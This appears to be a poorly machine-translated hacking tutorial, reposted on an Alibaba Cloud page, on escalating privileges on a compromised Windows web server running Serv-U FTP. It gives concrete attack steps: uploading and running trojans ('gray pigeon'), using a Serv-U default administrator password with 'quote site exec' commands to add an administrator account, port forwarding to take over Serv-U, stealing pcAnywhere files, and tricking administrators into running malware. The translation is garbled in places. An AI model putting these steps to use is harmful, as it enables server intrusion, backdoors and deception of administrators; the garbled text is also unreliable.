How to increase the Elevation of Privilege

Source: Internet
Author: User
Tags website server

I. First, check whether the website server has opened the 3389 remote terminal.

Ii. Check whether serv-u is used for the Service (what version is available)

Method

I. Copy a website and connect it with the 3389 login device (whether it is successful)

The connection is available. The chance of winning the server is increased by 30%.

Ii. Check the next server version in ftp mode.

Start -- run -- cmd -- ftp (add the website you want to log on)

Bytes ---------------------------------------------------------------------------------------

Step 1: The simplest method

Check whether you have the permission to execute the command. If you want to execute the command, directly upload a pigeon to run the command (the success rate is very low)

Bytes ----------------------------------------------------------------------------------------

Step 2: Find the directory with the execution permission

C: winntsystem32inetsrvdata

C: Documents and SettingsAll Users

C: Program Filesserv-u

C: Program FilesMicrosoft SQL Server

Such a directory can be directly uploaded and run

Bytes -----------------------------------------------------------------------------------

Step 3: directly add an account to the ftp.exe file of the personal account and Account Opening

The command is to upload the Directory D: VMware workstationconfigur.exe "net user xiao/add"

Bytes -----------------------------------------------------------------------------------

Step 4: asp Privilege Escalation Trojan directly Privilege Escalation

Serv-u 6.3 seems to have used an asp Privilege Escalation Trojan (unsuccessful)

Serv-u 6.2 seems to be okay.

However, the attacker cannot use asp Trojans to view servers.

It is assumed that after the authentication is directly obtained using asp, it is still unsuccessful, but you can

Use this account to connect to cmd.

Ftp (website with your Elevation of Privilege)

Account: LocalAdministrator password: $ ak #. 1 k; 0 @ p "> #1 @ $ ak #. 1 k; 0 @ p

If the connection is successful, you can directly add an administrator account.

Command: quote site exec (the account you added). net user 123 123/ad

Quote site exec (escalate the account to the highest permission) net localgroup administartors 123/add

Bytes ---------------------------------------------------------------------------------------

Step 5: pcaanywhere

C: Documents and SettingsAll UsersApplication DataSymantecpcAnywhere

Download his GIF file and install pcanywhere locally.

Many tutorials on the Internet

Bytes ---------------------------------------------------------------------------------------

Step 6: Enable serv-u Overwrite

Install a local su and use the ServUDaemon. ini file downloaded from him.

Many tutorials on the Internet

Bytes ----------------------------------------------------------------------------------------

Step 7: Serv-U forwarding Port

I used this method to add salt to Latte (a full set of tutorials on serv-u classic Privilege Escalation). You can learn it.

Upload port forwarding tools

Command: (Tool Name)-v-l 3333-r 43958 127.0.0.1

It means to map port 3333 to port 43958. Then you can install a Serv-u locally and create a new server,

Fill in the IP address of the other party. The password for the Account LocalAdministrator is $ ak #. 1 k; 0 @ p "> #1 @ $ ak #. 1 k; 0 @ p,

After the connection, you can manage his Serv-u.

Bytes --------------------------------------------------------------------------------------------

Step 8: Elevation of Privilege in social engineering

Transfer the gray pigeon to the above, and then transfer it to the drive C, and then wait for the Administrator to run, so that your pigeon must not be killed

If you want me to see an unclear exe program, I 'd like to open it)

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.